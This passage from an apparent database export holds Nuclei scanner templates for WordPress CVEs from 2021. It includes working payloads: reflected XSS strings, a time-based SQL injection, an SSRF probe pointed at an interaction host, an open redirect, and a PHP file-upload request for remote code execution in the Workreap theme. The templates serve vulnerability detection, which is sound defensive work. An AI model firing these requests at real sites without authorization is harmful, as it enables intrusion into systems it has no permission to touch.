WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: |\n Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24406\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24406\n cwe-id: CWE-601\n epss-score: 0.00137\n epss-percentile: 0.48279\n cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: gvectors\n product: wpforo_forum\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,redirect,gvectors\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a004630440220210c513d35e61e20ff58b5cd0035629cfc8606dffc895528b2da962e129fa1b50220150066296aa3e0d1aa5ab2717d86c5f46f4884e4b3a95a854377574c49fc196c:922c64590222798bb761d5b6d8e72950", "hash": "94717d2a1b3d3e1d7ccd7c497809aabd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bb" }, "name": "CVE-2021-24407.yaml", "content": "id: CVE-2021-24407\n\ninfo:\n name: WordPress Jannah Theme <5.4.5 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting 
vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24407\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24407\n cwe-id: CWE-79\n epss-score: 0.00207\n epss-percentile: 0.58055\n cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tielabs\n product: jannah\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/jannah/assets/'\n - 'attachment-jannah-image-'\n condition: or\n\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n\n action=tie_ajax_search&query[]=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a876f00fdc3eb21c7cf5e9e9c5227ff39b40d55af7669f205a6def322179eefb02202ba5e17e0f6a3f89085d5e0b0cb91635833014c28a5395d68a513213a0787da4:922c64590222798bb761d5b6d8e72950", "hash": "9deaf3ea84417ca5d8bc2810d16c4433", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bc" }, "name": 
"CVE-2021-24409.yaml", "content": "id: CVE-2021-24409\n\ninfo:\n name: Prismatic < 2.8 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.\n remediation: Fixed in version 2.8\n reference:\n - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24409\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24409\n cwe-id: CWE-79\n epss-score: 0.00161\n epss-percentile: 0.51755\n cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugin-planet\n product: prismatic\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/prismatic\"\n tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"Leave A Review?\")'\n - 'contains(body_2, \"onanimationend=alert(document.domain)\")'\n condition: and\n# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950", "hash": 
"78f20766bddb22a7049e7c696c6a48ce", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bd" }, "name": "CVE-2021-24435.yaml", "content": "id: CVE-2021-24435\n\ninfo:\n name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting\n author: xcapri,ritikchaddha\n severity: medium\n description: |\n The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.7.12\n reference:\n - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24435\n - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24435\n cwe-id: CWE-79\n epss-score: 0.0014\n epss-percentile: 0.4866\n cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: gambit\n product: titan_framework\n framework: wordpress\n tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27\"\n - 
\"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27\"\n - \"{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - (?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?\n - '

    Grumpy wizards make'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950", "hash": "bc8dfb20dcd6ba7853c3066bf0af156e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082be" }, "name": "CVE-2021-24436.yaml", "content": "id: CVE-2021-24436\n\ninfo:\n name: WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 2.1.4.\n reference:\n - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0\n - https://wordpress.org/plugins/w3-total-cache/\n - https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24436\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24436\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.4009\n cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: boldgrid\n product: w3_total_cache\n framework: wordpress\n tags: 
cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(body_2, '>&action=view')\n - contains(header_2, \"text/html\")\n condition: and\n# digest: 490a0046304402201ef6e350c911751d8d5e81ed50cb77824d6c9a7d2c0f9d5ea8e46a0be6ed7eb60220354d8aed65ef0a2257c2b945941807aa31ab5378f1612ae21f59f25020ef5de6:922c64590222798bb761d5b6d8e72950", "hash": "9053096a22c59c1befde9282067b6099", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082bf" }, "name": "CVE-2021-24442.yaml", "content": "id: CVE-2021-24442\n\ninfo:\n name: Wordpress Polls Widget < 1.5.3 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n remediation: Fixed in 1.5.3\n reference:\n - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24442\n - https://wordpress.org/plugins/polls-widget/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24442\n cwe-id: CWE-89\n epss-score: 0.00212\n epss-percentile: 0.58237\n cpe: cpe:2.3:a:wpdevart:poll\\,_survey\\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpdevart\n product: poll\\,_survey\\,_questionnaire_and_voting_system\n 
framework: wordpress\n publicwww-query: \"/wp-content/plugins/polls-widget/\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli\n\nhttp:\n - raw:\n - |\n @timeout: 25s\n POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Forwarded-For: {{randstr}}\n\n question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")'\n condition: and\n# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950", "hash": "9a12b6e64f8bb909aa16354a91c47e62", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c0" }, "name": "CVE-2021-24452.yaml", "content": "id: CVE-2021-24452\n\ninfo:\n name: WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. 
This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 2.1.5.\n reference:\n - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0\n - https://wordpress.org/plugins/w3-total-cache/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24452\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24452\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.4078\n cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: boldgrid\n product: w3_total_cache\n framework: wordpress\n tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')\n - contains(header_2, \"text/html\")\n condition: and\n# digest: 4a0a0047304502203b2db738722a6a6e1cf4aa896871e333bccd3809069eeb42e599a6549a6a4cc80221008351b510b897929c71b87698098af6cc925f9e1328c8e1f63b39b87de2dd6fd5:922c64590222798bb761d5b6d8e72950", "hash": "70222eda6d735155e9139c34568ff0b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c1" }, "name": "CVE-2021-24472.yaml", "content": "id: CVE-2021-24472\n\ninfo:\n 
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery\n author: Suman_Kar\n severity: critical\n description: |\n Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n impact: |\n Remote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access.\n remediation: |\n Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24472\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24472\n cwe-id: CWE-918\n epss-score: 0.04362\n epss-percentile: 0.92159\n cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qantumthemes\n product: kentharadio\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/qt-kentharadio\"\n tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022057be194a5808d00466ff72b9e508174e10f7370ed4dd276f27c062b8d8bc93c4022100a1fa11246e181d2b40cae6ef33377d5fb321750789d7bcc03b09c87b93238a16:922c64590222798bb761d5b6d8e72950", "hash": "ae3b511c515ac7be83a581300de5d086", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c2" }, "name": "CVE-2021-24488.yaml", "content": "id: CVE-2021-24488\n\ninfo:\n name: WordPress Post Grid <2.1.8 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24488\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24488\n cwe-id: CWE-79\n epss-score: 0.00302\n epss-percentile: 0.66468\n cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: pickplugins\n product: post_grid\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\\\"onmouseover=alert(document.domain)/\">'\n - 'Post Grid'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030e1b52d427b8fa524617a379f6c6577fd6b77e2b700feb71480fc7cc8beae5d022100dcd519ccb88c1a361a54e82b4e61a103ada287fb1416ae9e281a5c1b2a4132d7:922c64590222798bb761d5b6d8e72950", "hash": "1374d385482e964d4b1491f35759018b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c3" }, "name": "CVE-2021-24495.yaml", "content": "id: CVE-2021-24495\n\ninfo:\n name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting\n author: johnjhacking\n severity: medium\n description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. 
It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.\n reference:\n - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/\n - https://wordpress.org/plugins/marmoset-viewer/#developers\n - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24495\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24495\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44405\n cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: marmoset\n product: marmoset_viewer\n framework: wordpress\n tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://\"\n - \"{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - alert(/{{randstr}}/)\n condition: or\n\n - type: word\n words:\n - Marmoset Viewer\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950", "hash": "eebc0cf339a48abb4bf3a2aa74f1fd8c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c4" }, "name": "CVE-2021-24498.yaml", "content": "id: CVE-2021-24498\n\ninfo:\n name: WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting\n author: suman_kar\n severity: medium\n description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24498\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24498\n cwe-id: CWE-79\n epss-score: 0.00161\n epss-percentile: 0.51755\n cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: dwbooster\n product: calendar_event_multi_view\n framework: wordpress\n tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster\n\nhttp:\n - raw:\n - |\n GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 
HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '><'\n - 'Calendar Details'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022053f7aa1da929328cbebc337daa2af812dc588d126578f5cfae4ff8b30fcc5e2702203cec9721837ea172c547273360bc6802dc4fae7d289079e5b59e5f73b956c4f8:922c64590222798bb761d5b6d8e72950", "hash": "b132d6e32e77a2aae0ac3da151a61a2a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c5" }, "name": "CVE-2021-24499.yaml", "content": "id: CVE-2021-24499\n\ninfo:\n name: WordPress Workreap - Remote Code Execution\n author: daffainfo\n severity: critical\n description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. 
Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the Workreap plugin to fix the vulnerability.\n reference:\n - https://github.com/RyouYoo/CVE-2021-24499\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24499\n - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb\n - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/\n - http://packetstormsecurity.com/files/172876/WordPress-Workreap-2.2.2-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24499\n cwe-id: CWE-434\n epss-score: 0.16767\n epss-percentile: 0.9591\n cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: amentotech\n product: workreap\n framework: wordpress\n tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\n X-Requested-With: XMLHttpRequest\n\n -----------------------------cd0dc6bdc00b1cf9\n Content-Disposition: form-data; name=\"action\"\n\n workreap_award_temp_file_uploader\n -----------------------------cd0dc6bdc00b1cf9\n Content-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-httpd-php\n\n \n -----------------------------cd0dc6bdc00b1cf9--\n - |\n GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"71abe5077dae2754c36d731cc1534d4d\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502201e22febd5462a0be98462812711242057b437c93c64fd8835364333cd855ef6a022100bf167dcb1c4fd23ab6c1afc53058fc873c6c603b9f298cf0593d484f453a0b3b:922c64590222798bb761d5b6d8e72950", "hash": "1579d0662c14a94f9f920c0c01762ffd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c6" }, "name": "CVE-2021-24510.yaml", "content": "id: CVE-2021-24510\n\ninfo:\n name: WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation.\n reference:\n - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24510\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24510\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.50097\n cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:*\n metadata:\n max-request: 2\n vendor: mf_gig_calendar_project\n product: mf_gig_calendar\n tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php 